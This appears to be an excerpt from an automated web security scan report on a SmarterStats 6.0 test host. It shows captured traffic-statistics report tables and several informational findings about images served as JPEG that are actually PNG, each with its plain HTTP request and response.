<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcloudscandetails.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>cloudscandetails.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcrossdomain.xml','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>crossdomain.xml</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fria.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>ria.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2flearning.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>learning.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>70</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Paths</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Path_Paths"> <div class='ReportChart'><img src="/Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Path</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>/</td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
671</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>/sales.aspx<BR>/cloudscandetails.aspx<BR>/apptesting.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sitemap.aspx<BR>/<BR>/learning.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>/<BR>/report.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>/<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscan-netsparker-report.htm<BR>/cloudscanfaqs.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>/images/<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>/<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>/report.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>/<BR>/cloudscandetails.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>/test.aspx<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/learning.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/report.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>/test.aspx<BR>/cloudscandetails.aspx<BR>/apptesting.aspx<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (16)</td>
<td class='FooterTotal ar rc percentcolrc'>16</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>27</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Platforms</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Platforms"> <div class='ReportChart'><img src="/Temp/20226bc24c8e4c89926647164054826e.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Platform</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Win XP</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
677</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
374</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
6,097</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
53</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Win 7 / 2008 R2</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
177</td>
<td class='ar percentcol '>
<div class='percent percent10'></div>
148</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
3,211</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
25</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Win Vista / 2008</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
68,935</td>
<td class='ar percentcol '>
<div class='percent percent6'></div>
95</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
70,451</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,599</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
54</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
143</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
51</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
92</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
138</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
19</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
144</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Linux</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
32</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
18</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
527</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
4</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Win 2000</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
16</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
23</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Mac OS 10.6</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
5</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
148</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>Win 2003</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
21</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
31</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (6)</td>
<td class='FooterTotal ar percentcol'>18</td>
<td class='FooterTotal ar percentcol'>15</td>
<td class='FooterTotal ar percentcol'>368</td>
<td class='FooterTotal ar rc percentcolrc'>2</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>4,381</td>
<td class='FooterAverages ar percentcol'>49</td>
<td class='FooterAverages ar percentcol'>5,077</td>
<td class='FooterAverages ar rc percentcolrc'>293</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Browsers</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Browsers"> <div class='ReportChart'><img src="/Temp/1d4802d431604203a5254435a7181b01.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Browser</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Firefox</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
626</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
508</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
9,680</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
74</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>IE</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
69,210</td>
<td class='ar percentcol '>
<div class='percent percent7'></div>
144</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
70,552</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,608</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
54</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
143</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
52</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
49</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
63</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
138</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
19</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
144</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>Google Chrome</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
10</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
8</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
248</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Safari</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
7</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
289</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Opera</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
83</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Netscape</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>PlayStation Portable</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
31</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>7,010</td>
<td class='FooterAverages ar percentcol'>79</td>
<td class='FooterAverages ar percentcol'>8,123</td>
<td class='FooterAverages ar rc percentcolrc'>469</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Monthly Totals</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ACT_Monthly_Totals"> <div class='ReportChart'><img src="/Temp/91331a080c0148b0bddd5d75991acb5b.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='al lc'>Month</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='al lc'>October, 2010</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
70,352</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
1,012</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
84,873</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,725</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al'>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,352</td>
<td class='FooterTotal ar percentcol'>1,012</td>
<td class='FooterTotal ar percentcol'>84,873</td>
<td class='FooterTotal ar rc percentcolrc'>4,725</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al'>Average(s)</td>
<td class='FooterAverages ar percentcol'>70,352</td>
<td class='FooterAverages ar percentcol'>1,012</td>
<td class='FooterAverages ar percentcol'>84,873</td>
<td class='FooterAverages ar rc percentcolrc'>4,725</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Weekday Totals</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ACT_DOW_Totals"> <div class='ReportChart'><img src="/Temp/5bf056fa42644067bd0099f9d59829e2.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='al lc'>Week Day</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='al lc'>Sunday</td>

<td class='ar percentcol '>
<div class='percent percent19'></div>
28,509</td>
<td class='ar percentcol '>
<div class='percent percent20'></div>
109</td>
<td class='ar percentcol '>
<div class='percent percent20'></div>
30,005</td>
<td class='ar percentcol rc'>
<div class='percent percent20'></div>
1,914</td>
</tr>
<tr class="alt">
<td class='al lc'>Monday</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
37,279</td>
<td class='ar percentcol '>
<div class='percent percent18'></div>
98</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
38,813</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
2,474</td>
</tr>
<tr >
<td class='al lc'>Tuesday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
116</td>
<td class='ar percentcol '>
<div class='percent percent19'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
1,605</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
11</td>
</tr>
<tr class="alt">
<td class='al lc'>Wednesday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
120</td>
<td class='ar percentcol '>
<div class='percent percent19'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
1,454</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
15</td>
</tr>
<tr >
<td class='al lc'>Thursday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
451</td>
<td class='ar percentcol '>
<div class='percent percent25'></div>
131</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
2,015</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
18</td>
</tr>
<tr class="alt">
<td class='al lc'>Friday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
149</td>
<td class='ar percentcol '>
<div class='percent percent23'></div>
123</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
1,872</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
17</td>
</tr>
<tr >
<td class='al lc'>Saturday</td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
3,481</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
135</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
5,471</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
245</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al'>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al'>Average(s)</td>
<td class='FooterAverages ar percentcol'>10,015</td>
<td class='FooterAverages ar percentcol'>113</td>
<td class='FooterAverages ar percentcol'>11,605</td>
<td class='FooterAverages ar rc percentcolrc'>671</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Search Engine Breakdown</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="SEO_Engines"> <div class='ReportChart'><img src="/Temp/8494271a59234d898cdd787b473092ed.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Search Engine</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Google</td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Yandex</td>

<td class='ar percentcol rc'>
<div class='percent percent17'></div>
2</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>5</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>2</td>
</tr>
</tfoot>
</table></div>
</div>
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||5468|hiddenField|__VIEWSTATE|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|53|asyncPostBackControlIDs||ctl00$MPH$btnGenerateReport,,ctl00$MPH$btnShowReport,|0|postBackControlIDs|||86|updatePanelIDs||tctl00$BPH$UpdatePanel2,,tctl00$UpdatePanel1,,tctl00$MPH$UpdatePanel1,,tctl00$MPH$UP1,|0|childUpdatePanelIDs|||82|panelsToRefreshIDs||ctl00$BPH$UpdatePanel2,,ctl00$UpdatePanel1,,ctl00$MPH$UpdatePanel1,,ctl00$MPH$UP1,|2|asyncPostBackTimeout||90|70|formAction||frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO|26|pageTitle||View Report - SmarterStats|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|

10.6. http://vulnerable.smarterstats.6.0.host:9999/Temp/0c2c2823b31f46149208732c08a4fee8.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/0c2c2823b31f46149208732c08a4fee8.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/0c2c2823b31f46149208732c08a4fee8.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:31:53 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BAE755A80"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close


10.7. http://vulnerable.smarterstats.6.0.host:9999/Temp/1039b7037bea4372821b6b290d0745da.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/1039b7037bea4372821b6b290d0745da.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/1039b7037bea4372821b6b290d0745da.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:18 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BE11F5300"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close


10.8. http://vulnerable.smarterstats.6.0.host:9999/Temp/1d4802d431604203a5254435a7181b01.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/1d4802d431604203a5254435a7181b01.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/1d4802d431604203a5254435a7181b01.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8851B980"
Content-Type: image/jpeg
Content-Length: 18895
Connection: Close


10.9. http://vulnerable.smarterstats.6.0.host:9999/Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: "1CB682F87B92300"
Content-Type: image/jpeg
Content-Length: 7501
Connection: Close

